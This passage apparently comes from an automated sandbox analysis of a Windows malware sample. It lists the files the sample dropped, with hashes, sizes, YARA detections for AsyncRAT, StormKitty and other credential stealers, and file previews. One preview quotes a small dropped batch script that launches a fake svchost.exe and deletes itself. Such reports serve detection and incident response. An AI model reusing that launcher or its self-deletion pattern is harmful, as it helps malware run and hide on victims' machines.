                                                                  SSDEEP:24:3K/ZWSKco4KmZjKbmOIld6emN1s4RPQoU99tXt/NK3R8e9ia4:AWSU4xym/jms4RIoU99tlNWR82m
                                                                  MD5:DECF085D1067F7B0CC8044B2152F6B68
                                                                  SHA1:386F4D0A428293E1EAE6FAA840CC60668C611CAB
                                                                  SHA-256:12AB17B4910CFAA4F343EE54992F106CA08F89334EFC4666766B0868B31BE18A
                                                                  SHA-512:6EF8AEEF4040BAF3F76D66695BCEB63EEEF05BB7A2F897B9AD436EDA2540F50EA0458499AB44AE367625A8A855721640AB3AFA84B86F584B413AC896EC3BF833
                                                                  Malicious:false
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:modified
                                                                  Size (bytes):179200
                                                                  Entropy (8bit):5.896732339431866
                                                                  Encrypted:false
                                                                  SSDEEP:3072:Ie8p6ewdOIwQx76vK/bvTv0cU+lL/dMlZZUZ0b2gTrwARE+WpCc:c6ewwIwQJ6vKX0c5MlYZ0b2s
                                                                  MD5:FF895D93516828450E0C0DD0E467E1D0
                                                                  SHA1:A19EDAA4B1FBFB8B3C8FE61D4CAC894BEB921B39
                                                                  SHA-256:24C4301E81D0F742D7470FDAAE62499B9793265F2E78D77C71E8B84BF1718CCA
                                                                  SHA-512:C3758AA89990653619C4803122FD0761E1C2709FEA0DD9B89317AC4627D4E73E54A15397F121716B1DD48FB180FBBD2ED4A3C7B799B11743B2F9079CD1B9F75E
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: Joe Security
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: ditekSHen
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: ditekSHen
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: ditekSHen
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: ditekSHen
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                  Category:dropped
                                                                  Size (bytes):5242880
                                                                  Entropy (8bit):0.037963276276857943
                                                                  Encrypted:false
                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                  MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                  SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                  SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                  SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                  Category:dropped
                                                                  Size (bytes):106496
                                                                  Entropy (8bit):1.1358696453229276
                                                                  Encrypted:false
                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                  Category:dropped
                                                                  Size (bytes):40960
                                                                  Entropy (8bit):0.8553638852307782
                                                                  Encrypted:false
                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                  Category:dropped
                                                                  Size (bytes):159744
                                                                  Entropy (8bit):0.7873599747470391
                                                                  Encrypted:false
                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                  Category:dropped
                                                                  Size (bytes):159744
                                                                  Entropy (8bit):0.7873599747470391
                                                                  Encrypted:false
                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                  Category:dropped
                                                                  Size (bytes):106496
                                                                  Entropy (8bit):1.1358696453229276
                                                                  Encrypted:false
                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                  Malicious:false
                                                                  Preview:SQLite format 3 ... (binary SQLite header; non-printable bytes omitted)
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                  Category:dropped
                                                                  Size (bytes):114688
                                                                  Entropy (8bit):0.9746603542602881
                                                                  Encrypted:false
                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                  Malicious:false
                                                                  Preview:SQLite format 3 ... (binary SQLite header; non-printable bytes omitted)
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                  Category:dropped
                                                                  Size (bytes):114688
                                                                  Entropy (8bit):0.9746603542602881
                                                                  Encrypted:false
                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                  Malicious:false
                                                                  Preview:SQLite format 3 ... (binary SQLite header; non-printable bytes omitted)
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                  Category:dropped
                                                                  Size (bytes):49152
                                                                  Entropy (8bit):0.8180424350137764
                                                                  Encrypted:false
                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                  Malicious:false
                                                                  Preview:SQLite format 3 ... (binary SQLite header; non-printable bytes omitted)
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):0.47147045728725767
                                                                  Encrypted:false
                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                  Malicious:false
                                                                  Preview:SQLite format 3 ... (binary SQLite header; non-printable bytes omitted)
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                  Category:dropped
                                                                  Size (bytes):98304
                                                                  Entropy (8bit):0.08235737944063153
                                                                  Encrypted:false
                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                  Malicious:false
                                                                  Preview:SQLite format 3 ... (binary SQLite header; non-printable bytes omitted)
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                  Category:dropped
                                                                  Size (bytes):5242880
                                                                  Entropy (8bit):0.037963276276857943
                                                                  Encrypted:false
                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                  MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                  SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                  SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                  SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                  Malicious:false
                                                                  Preview:SQLite format 3 ... (binary SQLite header; non-printable bytes omitted)
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                  Category:dropped
                                                                  Size (bytes):106496
                                                                  Entropy (8bit):1.1358696453229276
                                                                  Encrypted:false
                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                  Malicious:false
                                                                  Preview:SQLite format 3 ... (binary SQLite header; non-printable bytes omitted)
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                  Category:dropped
                                                                  Size (bytes):40960
                                                                  Entropy (8bit):0.8553638852307782
                                                                  Encrypted:false
                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                  Malicious:false
                                                                  Preview:SQLite format 3 ... (binary SQLite header; non-printable bytes omitted)
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                  Category:dropped
                                                                  Size (bytes):159744
                                                                  Entropy (8bit):0.7873599747470391
                                                                  Encrypted:false
                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                  Malicious:false
                                                                  Preview:SQLite format 3 ... (binary SQLite header; non-printable bytes omitted)
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                  Category:dropped
                                                                  Size (bytes):159744
                                                                  Entropy (8bit):0.7873599747470391
                                                                  Encrypted:false
                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                  Malicious:false
                                                                  Preview:SQLite format 3 ... (binary SQLite header; non-printable bytes omitted)
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                  Category:dropped
                                                                  Size (bytes):106496
                                                                  Entropy (8bit):1.1358696453229276
                                                                  Encrypted:false
                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                  Malicious:false
                                                                  Preview:SQLite format 3 ... (binary SQLite header; non-printable bytes omitted)
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                  Category:dropped
                                                                  Size (bytes):114688
                                                                  Entropy (8bit):0.9746603542602881
                                                                  Encrypted:false
                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                  Category:dropped
                                                                  Size (bytes):114688
                                                                  Entropy (8bit):0.9746603542602881
                                                                  Encrypted:false
                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                  Category:dropped
                                                                  Size (bytes):49152
                                                                  Entropy (8bit):0.8180424350137764
                                                                  Encrypted:false
                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):0.47147045728725767
                                                                  Encrypted:false
                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                  Category:dropped
                                                                  Size (bytes):98304
                                                                  Entropy (8bit):0.08235737944063153
                                                                  Encrypted:false
                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                  Category:dropped
                                                                  Size (bytes):5242880
                                                                  Entropy (8bit):0.037963276276857943
                                                                  Encrypted:false
                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                  MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                  SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                  SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                  SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                  Malicious:false
                                                                  Process:C:\Users\user\Desktop\zrrHgsDzgS.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):151
                                                                  Entropy (8bit):5.064643106061638
                                                                  Encrypted:false
                                                                  SSDEEP:3:mKDDCMNqTtvL5ot+kiEaKC5ZACSmqRDt+kiE2J5xAInTRIJhOW1ZPy:hWKqTtT6wknaZ5Omq1wkn23fT5W1k
                                                                  MD5:16EFA3D025FBB6C36676834B1277C189
                                                                  SHA1:CD9086EC5B6C2BCE989E3AAE7DBF1A36795F859D
                                                                  SHA-256:AFD244EC141ECEDD498F3A165C81449555B83F4CA58437CF2B6FF15A68A7FA7D
                                                                  SHA-512:7076C2CE417D4E1E6F151E690B102CE5009064F786174208A9D60276CADD99C195706A3780810CEB109F225BAF13034CB9D44D3138AAB638A2CBD0AC0550F093
                                                                  Malicious:false
                                                                  Preview:@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\svchost.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpF775.tmp.bat" /f /q..
                                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):179200
                                                                  Entropy (8bit):5.89687638053006
                                                                  Encrypted:false
